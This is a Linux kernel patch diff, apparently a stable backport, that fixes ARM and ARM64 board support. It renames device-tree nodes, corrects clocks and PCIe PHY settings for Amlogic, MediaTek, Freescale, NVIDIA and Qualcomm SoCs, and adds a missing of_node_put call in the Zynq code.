+diff --git a/arch/arm/mach-s3c/s3c64xx.c b/arch/arm/mach-s3c/s3c64xx.c
+index 0a8116c108fe4..dce2b0e953088 100644
+--- a/arch/arm/mach-s3c/s3c64xx.c
++++ b/arch/arm/mach-s3c/s3c64xx.c
+@@ -173,7 +173,8 @@ static struct samsung_pwm_variant s3c64xx_pwm_variant = {
+ 	.tclk_mask	= (1 << 7) | (1 << 6) | (1 << 5),
+ };
+ 
+-void __init s3c64xx_set_timer_source(unsigned int event, unsigned int source)
++void __init s3c64xx_set_timer_source(enum s3c64xx_timer_mode event,
++				     enum s3c64xx_timer_mode source)
+ {
+ 	s3c64xx_pwm_variant.output_mask = BIT(SAMSUNG_PWM_NUM) - 1;
+ 	s3c64xx_pwm_variant.output_mask &= ~(BIT(event) | BIT(source));
+diff --git a/arch/arm/mach-zynq/slcr.c b/arch/arm/mach-zynq/slcr.c
+index 37707614885a5..9765b3f4c2fc5 100644
+--- a/arch/arm/mach-zynq/slcr.c
++++ b/arch/arm/mach-zynq/slcr.c
+@@ -213,6 +213,7 @@ int __init zynq_early_slcr_init(void)
+ 	zynq_slcr_regmap = syscon_regmap_lookup_by_compatible("xlnx,zynq-slcr");
+ 	if (IS_ERR(zynq_slcr_regmap)) {
+ 		pr_err("%s: failed to find zynq-slcr\n", __func__);
++		of_node_put(np);
+ 		return -ENODEV;
+ 	}
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index c5ccca26a4087..ddfd35c86bdac 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -100,7 +100,6 @@ config ARM64
+ 	select ARCH_WANT_DEFAULT_TOPDOWN_MMAP_LAYOUT
+ 	select ARCH_WANT_FRAME_POINTERS
+ 	select ARCH_WANT_HUGE_PMD_SHARE if ARM64_4K_PAGES || (ARM64_16K_PAGES && !ARM64_VA_BITS_36)
+-	select ARCH_WANT_HUGETLB_PAGE_OPTIMIZE_VMEMMAP
+ 	select ARCH_WANT_LD_ORPHAN_WARN
+ 	select ARCH_WANTS_NO_INSTR
+ 	select ARCH_WANTS_THP_SWAP if ARM64_4K_PAGES
+diff --git a/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi b/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
+index 5836b00309312..e1605a9b0a13f 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
+@@ -168,15 +168,15 @@
+ 		reg = <0x32 0x20>;
+ 	};
+ 
+-	eth_mac: eth_mac@0 {
++	eth_mac: eth-mac@0 {
+ 		reg = <0x0 0x6>;
+ 	};
+ 
+-	bt_mac: bt_mac@6 {
++	bt_mac: bt-mac@6 {
+ 		reg = <0x6 0x6>;
+ 	};
+ 
+-	wifi_mac: wifi_mac@c {
++	wifi_mac: wifi-mac@c {
+ 		reg = <0xc 0x6>;
+ 	};
+ 
+@@ -217,7 +217,7 @@
+ 	pinctrl-names = "default";
+ 
+ 	/* RTC */
+-	pcf8563: pcf8563@51 {
++	pcf8563: rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 		status = "okay";
+@@ -303,7 +303,7 @@
+ 
+ &usb {
+ 	status = "okay";
+-	phy-supply = <&usb_pwr>;
++	vbus-supply = <&usb_pwr>;
+ };
+ 
+ &spicc1 {
+diff --git a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+index 417523dc4cc03..ff2b33313e637 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+@@ -153,7 +153,7 @@
+ 		scpi_clocks: clocks {
+ 			compatible = "arm,scpi-clocks";
+ 
+-			scpi_dvfs: clock-controller {
++			scpi_dvfs: clocks-0 {
+ 				compatible = "arm,scpi-dvfs-clocks";
+ 				#clock-cells = <1>;
+ 				clock-indices = <0>;
+@@ -162,7 +162,7 @@
+ 		};
+ 
+ 		scpi_sensors: sensors {
+-			compatible = "amlogic,meson-gxbb-scpi-sensors";
++			compatible = "amlogic,meson-gxbb-scpi-sensors", "arm,scpi-sensors";
+ 			#thermal-sensor-cells = <1>;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+index 7f55d97f6c283..c063a144e0e7b 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+@@ -1694,7 +1694,7 @@
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+ 
+-					internal_ephy: ethernet_phy@8 {
++					internal_ephy: ethernet-phy@8 {
+ 						compatible = "ethernet-phy-id0180.3301",
+ 							     "ethernet-phy-ieee802.3-c22";
+ 						interrupts = <GIC_SPI 9 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts b/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
+index e3bb6df42ff3e..cf0a9be83fc47 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
+@@ -401,5 +401,4 @@
+ 
+ &usb {
+ 	status = "okay";
+-	dr_mode = "host";
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
+index 7677764eeee6e..f58fd2a6fe61c 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
+@@ -58,26 +58,6 @@
+ 		compatible = "operating-points-v2";
+ 		opp-shared;
+ 
+-		opp-100000000 {
+-			opp-hz = /bits/ 64 <100000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-250000000 {
+-			opp-hz = /bits/ 64 <250000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-500000000 {
+-			opp-hz = /bits/ 64 <500000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-667000000 {
+-			opp-hz = /bits/ 64 <666666666>;
+-			opp-microvolt = <731000>;
+-		};
+-
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+ 			opp-microvolt = <731000>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12b-odroid-go-ultra.dts b/arch/arm64/boot/dts/amlogic/meson-g12b-odroid-go-ultra.dts
+index 1e40709610c52..c8e5a0a42b898 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12b-odroid-go-ultra.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-g12b-odroid-go-ultra.dts
+@@ -381,6 +381,7 @@
+ 		reg = <0x1c>;
+ 		interrupt-parent = <&gpio_intc>;
+ 		interrupts = <7 IRQ_TYPE_LEVEL_LOW>; /* GPIOAO_7 */
++		#clock-cells = <1>;
+ 
+ 		vcc1-supply = <&vdd_sys>;
+ 		vcc2-supply = <&vdd_sys>;
+@@ -391,7 +392,6 @@
+ 		vcc8-supply = <&vcc_2v3>;
+ 		vcc9-supply = <&vddao_3v3>;
+ 		boost-supply = <&vdd_sys>;
+-		switch-supply = <&vdd_sys>;
+ 
+ 		regulators {
+ 			vddcpu_a: DCDC_REG1 {
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi b/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
+index bcdf55f48a831..4e84ab87cc7db 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
+@@ -17,7 +17,7 @@
+ 		io-channel-names = "buttons";
+ 		keyup-threshold-microvolt = <1800000>;
+ 
+-		update-button {
++		button-update {
+ 			label = "update";
+ 			linux,code = <KEY_VENDOR>;
+ 			press-threshold-microvolt = <1300000>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+index 5eed15035b674..11f89bfecb56a 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+@@ -233,7 +233,7 @@
+ 			reg = <0x14 0x10>;
+ 		};
+ 
+-		eth_mac: eth_mac@34 {
++		eth_mac: eth-mac@34 {
+ 			reg = <0x34 0x10>;
+ 		};
+ 
+@@ -250,7 +250,7 @@
+ 		scpi_clocks: clocks {
+ 			compatible = "arm,scpi-clocks";
+ 
+-			scpi_dvfs: scpi_clocks@0 {
++			scpi_dvfs: clocks-0 {
+ 				compatible = "arm,scpi-dvfs-clocks";
+ 				#clock-cells = <1>;
+ 				clock-indices = <0>;
+@@ -532,7 +532,7 @@
+ 			#size-cells = <2>;
+ 			ranges = <0x0 0x0 0x0 0xc8834000 0x0 0x2000>;
+ 
+-			hwrng: rng {
++			hwrng: rng@0 {
+ 				compatible = "amlogic,meson-rng";
+ 				reg = <0x0 0x0 0x0 0x4>;
+ 			};
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts b/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
+index 6d8cc00fedc7f..5f2d4317ecfbf 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
+@@ -16,7 +16,7 @@
+ 
+ 	leds {
+ 		compatible = "gpio-leds";
+-		status {
++		led {
+ 			gpios = <&gpio_ao GPIOAO_13 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+ 			color = <LED_COLOR_ID_RED>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
+index 9ef210f17b4aa..393d3cb33b9ee 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
+@@ -18,7 +18,7 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		status {
++		led {
+ 			label = "n1:white:status";
+ 			gpios = <&gpio_ao GPIOAO_9 GPIO_ACTIVE_HIGH>;
+ 			default-state = "on";
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
+index b331a013572f3..c490dbbf063bf 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
+@@ -79,6 +79,5 @@
+ 		enable-gpios = <&gpio GPIOX_17 GPIO_ACTIVE_HIGH>;
+ 		max-speed = <2000000>;
+ 		clocks = <&wifi32k>;
+-		clock-names = "lpo";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
+index 6831137c5c109..a18d6d241a5ad 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
+@@ -86,11 +86,11 @@
+ };
+ 
+ &efuse {
+-	bt_mac: bt_mac@6 {
++	bt_mac: bt-mac@6 {
+ 		reg = <0x6 0x6>;
+ 	};
+ 
+-	wifi_mac: wifi_mac@C {
++	wifi_mac: wifi-mac@c {
+ 		reg = <0xc 0x6>;
+ 	};
+ };
+@@ -239,7 +239,7 @@
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&i2c_b_pins>;
+ 
+-	pcf8563: pcf8563@51 {
++	pcf8563: rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 		status = "okay";
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+index 04e9d0f1bde0f..5905a6df09b04 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+@@ -773,7 +773,7 @@
+ 		};
+ 	};
+ 
+-	eth-phy-mux {
++	eth-phy-mux@55c {
+ 		compatible = "mdio-mux-mmioreg", "mdio-mux";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts b/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
+index cadba194b149b..38ebe98ba9c6b 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
+@@ -17,13 +17,13 @@
+ 	compatible = "bananapi,bpi-m5", "amlogic,sm1";
+ 	model = "Banana Pi BPI-M5";
+ 
+-	adc_keys {
++	adc-keys {
+ 		compatible = "adc-keys";
+ 		io-channels = <&saradc 2>;
+ 		io-channel-names = "buttons";
+ 		keyup-threshold-microvolt = <1800000>;
+ 
+-		key {
++		button-sw3 {
+ 			label = "SW3";
+ 			linux,code = <BTN_3>;
+ 			press-threshold-microvolt = <1700000>;
+@@ -123,7 +123,7 @@
+ 		regulator-min-microvolt = <1800000>;
+ 		regulator-max-microvolt = <3300000>;
+ 
+-		enable-gpio = <&gpio_ao GPIOE_2 GPIO_ACTIVE_HIGH>;
++		enable-gpio = <&gpio_ao GPIOE_2 GPIO_OPEN_DRAIN>;
+ 		enable-active-high;
+ 		regulator-always-on;
+ 
+diff --git a/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts b/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
+index a1f0c38ccadda..74088e7280fee 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
+@@ -76,9 +76,17 @@
+ };
+ 
+ &cpu_thermal {
++	trips {
++		cpu_active: cpu-active {
++			temperature = <60000>; /* millicelsius */
++			hysteresis = <2000>; /* millicelsius */
++			type = "active";
++		};
++	};
++
+ 	cooling-maps {
+ 		map {
+-			trip = <&cpu_passive>;
++			trip = <&cpu_active>;
+ 			cooling-device = <&fan0 THERMAL_NO_LIMIT THERMAL_NO_LIMIT>;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm.dtsi b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+index 4ee89fdcf59bd..b45852e8087a9 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+@@ -563,7 +563,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mm_uid: unique-id@410 {
++				imx8mm_uid: unique-id@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn.dtsi b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+index b7d91df71cc26..7601a031f85a0 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+@@ -564,7 +564,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mn_uid: unique-id@410 {
++				imx8mn_uid: unique-id@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp.dtsi b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+index 03034b439c1f7..bafe0a572f7e9 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+@@ -425,7 +425,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mp_uid: unique-id@420 {
++				imx8mp_uid: unique-id@8 {
+ 					reg = <0x8 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq.dtsi b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+index 7ce99c084e545..6eb5a98bb1bd4 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+@@ -593,7 +593,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mq_uid: soc-uid@410 {
++				imx8mq_uid: soc-uid@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622.dtsi b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+index 146e18b5b1f46..7bb316922a3a9 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+@@ -435,6 +435,7 @@
+ 	pwm: pwm@11006000 {
+ 		compatible = "mediatek,mt7622-pwm";
+ 		reg = <0 0x11006000 0 0x1000>;
++		#pwm-cells = <2>;
+ 		interrupts = <GIC_SPI 77 IRQ_TYPE_LEVEL_LOW>;
+ 		clocks = <&topckgen CLK_TOP_PWM_SEL>,
+ 			 <&pericfg CLK_PERI_PWM_PD>,
+diff --git a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+index 0e9406fc63e2d..0ed5e067928b5 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+@@ -167,8 +167,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@1001c000 {
+-			compatible = "mediatek,mt7986-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt7986-wdt";
+ 			reg = <0 0x1001c000 0 0x1000>;
+ 			interrupts = <GIC_SPI 110 IRQ_TYPE_LEVEL_HIGH>;
+ 			#reset-cells = <1>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index 402136bfd5350..268a1f28af8ce 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -585,6 +585,15 @@
+ 		method = "smc";
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -968,8 +977,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 200 IRQ_TYPE_LEVEL_HIGH>;
+-			clocks = <&topckgen CLK_TOP_CLK13M>;
+-			clock-names = "clk13m";
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		iommu: iommu@10205000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8186.dtsi b/arch/arm64/boot/dts/mediatek/mt8186.dtsi
+index c326aeb33a109..a02bf4ab1504d 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8186.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8186.dtsi
+@@ -47,14 +47,12 @@
+ 				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+-			};
+ 
+-			cluster1 {
+-				core0 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+ 
+-				core1 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -214,10 +212,12 @@
+ 		};
+ 	};
+ 
+-	clk13m: oscillator-13m {
+-		compatible = "fixed-clock";
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
+ 		#clock-cells = <0>;
+-		clock-frequency = <13000000>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
+ 		clock-output-names = "clk13m";
+ 	};
+ 
+@@ -333,8 +333,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@10007000 {
+-			compatible = "mediatek,mt8186-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt8186-wdt";
+ 			mediatek,disable-extrst;
+ 			reg = <0 0x10007000 0 0x1000>;
+ 			#reset-cells = <1>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192.dtsi b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+index 424fc89cc6f7c..627e3bf1c544b 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+@@ -29,6 +29,15 @@
+ 		rdma4 = &rdma4;
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator0 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -149,19 +158,16 @@
+ 				core3 {
+ 					cpu = <&cpu3>;
+ 				};
+-			};
+-
+-			cluster1 {
+-				core0 {
++				core4 {
+ 					cpu = <&cpu4>;
+ 				};
+-				core1 {
++				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+-				core2 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+-				core3 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -534,8 +540,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 233 IRQ_TYPE_LEVEL_HIGH 0>;
+-			clocks = <&topckgen CLK_TOP_CSW_F26M_D2>;
+-			clock-names = "clk13m";
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		pwrap: pwrap@10026000 {
+@@ -578,6 +583,8 @@
+ 			compatible = "mediatek,mt8192-scp_adsp";
+ 			reg = <0 0x10720000 0 0x1000>;
+ 			#clock-cells = <1>;
++			/* power domain dependency not upstreamed */
++			status = "fail";
+ 		};
+ 
+ 		uart0: serial@11002000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index c10cfeb1214d5..c5b8abc0c5854 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -151,22 +151,20 @@
+ 				core3 {
+ 					cpu = <&cpu3>;
+ 				};
+-			};
+ 
+-			cluster1 {
+-				core0 {
++				core4 {
+ 					cpu = <&cpu4>;
+ 				};
+ 
+-				core1 {
++				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+ 
+-				core2 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+ 
+-				core3 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -248,6 +246,15 @@
+ 		status = "disabled";
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator-26m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -687,8 +694,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@10007000 {
+-			compatible = "mediatek,mt8195-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt8195-wdt";
+ 			mediatek,disable-extrst;
+ 			reg = <0 0x10007000 0 0x100>;
+ 			#reset-cells = <1>;
+@@ -705,7 +711,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 265 IRQ_TYPE_LEVEL_HIGH 0>;
+-			clocks = <&topckgen CLK_TOP_CLK26M_D2>;
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		pwrap: pwrap@10024000 {
+@@ -1549,6 +1555,7 @@
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+ 			ranges = <0 0 0x11e30000 0xe00>;
++			power-domains = <&spm MT8195_POWER_DOMAIN_SSUSB_PCIE_PHY>;
+ 			status = "disabled";
+ 
+ 			u2port1: usb-phy@0 {
+diff --git a/arch/arm64/boot/dts/nvidia/tegra194.dtsi b/arch/arm64/boot/dts/nvidia/tegra194.dtsi
+index 4afcbd60e144e..d8169920b33b4 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra194.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra194.dtsi
+@@ -1918,6 +1918,7 @@
+ 			interconnects = <&mc TEGRA194_MEMORY_CLIENT_HOST1XDMAR &emc>;
+ 			interconnect-names = "dma-mem";
+ 			iommus = <&smmu TEGRA194_SID_HOST1X>;
++			dma-coherent;
+ 
+ 			/* Context isolation domains */
+ 			iommu-map = <0 &smmu TEGRA194_SID_HOST1X_CTX0 1>,
+diff --git a/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi b/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
+index dd9a17922fe5c..a87e103f3828d 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
+@@ -1667,7 +1667,7 @@
+ 		vin-supply = <&vdd_5v0_sys>;
+ 	};
+ 
+-	vdd_cam_1v2: regulator-vdd-cam-1v8 {
++	vdd_cam_1v2: regulator-vdd-cam-1v2 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "vdd-cam-1v2";
+ 		regulator-min-microvolt = <1200000>;
+diff --git a/arch/arm64/boot/dts/nvidia/tegra234.dtsi b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+index eaf05ee9acd18..77ceed615b7fc 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra234.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+@@ -571,6 +571,7 @@
+ 			interconnects = <&mc TEGRA234_MEMORY_CLIENT_HOST1XDMAR &emc>;
+ 			interconnect-names = "dma-mem";
+ 			iommus = <&smmu_niso1 TEGRA234_SID_HOST1X>;
++			dma-coherent;
+ 
+ 			/* Context isolation domains */
+ 			iommu-map = <0 &smmu_niso0 TEGRA234_SID_HOST1X_CTX0 1>,
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index 4e51d8e3df043..4294beeb494fd 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -137,7 +137,7 @@
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_USB1_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "gcc_usb1_pipe_clk_src";
++				clock-output-names = "usb3phy_1_cc_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -180,7 +180,7 @@
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_USB0_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "gcc_usb0_pipe_clk_src";
++				clock-output-names = "usb3phy_0_cc_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -197,9 +197,9 @@
+ 			status = "disabled";
+ 		};
+ 
+-		pcie_qmp0: phy@86000 {
+-			compatible = "qcom,ipq8074-qmp-pcie-phy";
+-			reg = <0x00086000 0x1c4>;
++		pcie_qmp0: phy@84000 {
++			compatible = "qcom,ipq8074-qmp-gen3-pcie-phy";
++			reg = <0x00084000 0x1bc>;
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+ 			ranges;
+@@ -213,15 +213,16 @@
+ 				      "common";
+ 			status = "disabled";
+ 
+-			pcie_phy0: phy@86200 {
+-				reg = <0x86200 0x16c>,
+-				      <0x86400 0x200>,
+-				      <0x86800 0x4f4>;
++			pcie_phy0: phy@84200 {
++				reg = <0x84200 0x16c>,
++				      <0x84400 0x200>,
++				      <0x84800 0x1f0>,
++				      <0x84c00 0xf4>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_PCIE0_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "pcie_0_pipe_clk";
++				clock-output-names = "pcie20_phy0_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -242,14 +243,14 @@
+ 			status = "disabled";
+ 
+ 			pcie_phy1: phy@8e200 {
+-				reg = <0x8e200 0x16c>,
++				reg = <0x8e200 0x130>,
+ 				      <0x8e400 0x200>,
+-				      <0x8e800 0x4f4>;
++				      <0x8e800 0x1f8>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_PCIE1_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "pcie_1_pipe_clk";
++				clock-output-names = "pcie20_phy1_pipe_clk";
